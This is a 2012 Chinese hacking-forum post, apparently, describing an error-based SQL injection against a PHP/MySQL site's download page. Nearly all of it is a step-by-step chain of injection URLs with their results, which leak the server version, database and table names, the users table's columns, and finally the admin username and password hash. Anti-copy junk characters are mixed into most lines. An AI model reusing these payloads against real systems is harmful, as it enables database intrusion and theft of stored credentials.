找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1941|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
& E4 S/ o2 e' d
) a! b5 w) F8 {, e' K( u! d5 s) y之前想找个测试 没想到这有 可以测试下做个记录而已
! @7 Z+ _% D: I, E) T( ?
$ H1 U# H4 U4 Dhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
2 L2 S( U7 |( _/ C+ N3 }( f; p3 v3 C( U* A+ ~3 E/ ^$ a: A) u$ c
/data0/htdocs/leqi_new/app/myapp.php) l2 f7 Y3 k' Y

) }. A1 y  G# D5 {0 u 或者
: z, e, l' z: U  @1 A2 I) l. u$ c: W, K$ b  ^( P2 [! v" Q  o
/**********version()**********/ 5.1.49-log- i  W0 k$ @4 b7 i1 i; q, x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 u8 b( M( ]  I; D/ b
. O" ]/ r1 o3 i4 e0 \% b/**********user()**********/  
$ X$ ^2 L% {2 i, M+ Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( @1 {  j% a7 T/ {, l- Z
% @& i- T& o$ x2 k
/**********database()**********/  leqi
" k+ l) z% x* Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ X4 L* ~) k! H: _% X" d
- f* Y' B4 e$ Y- O  S3 {( [
/**********limit依次递归爆库**********/$ ^" @0 h8 `8 b  M( X: R7 Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* u& n" Z' E1 q0 T
information_schema0 n+ K4 O* J/ S# T9 x. d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, J; U) v* b* g% n. cleqi
& C% N% N& J  h; y/ j4 k, Yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 k. x' _) U: k( F( j1 b( k$ ntest
- ]( s; S2 Q* c& [" p
$ u1 |: n; T( A3 I/ z6 f7 m/**********limit依次递归爆表名**********/% `- Q1 S. A$ x* \( H  Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 R/ D3 C& m) n- W* a* S6 \) f
users
/ \; d* i, Z; x- C
6 P, m$ n9 Q2 u9 c# X3 d/**********limit依次递归爆字段名**********/" T& L$ C0 C2 m' h! u1 `5 Y/ h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' V6 u& u% u1 l0 q7 ], ]9 F. ruser_id,username,nickname,passwd,group_id  x, e, X5 \; @& Z5 \' e- p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 a1 J  `) z5 x/wapc/5000_0005_003( [3 y* N) T. n  G5 m0 |
11 214 t9 @+ E- v0 Y2 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; j7 Y, a; J" |# h/wapc/5000_0005_003
3 U; y0 E! L9 Z1 Z. Y* _( H11 341 351 361
  |8 Y  C8 B* z" A5 M4 ]/**********爆数据**********/
; ]' J2 T7 ?# K% Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- G6 j# y% U! ^1 |3 @admin6 a. J8 V9 f% |2 G$ T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%232 i: n; W4 x" R* J' q2 w
6a8b4574ca231eb8bd52764d4978ffcd
0 T% _3 v- I& H3 F' e$ U, {9 W- r6 c" u& \
; v  r5 C8 F- l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表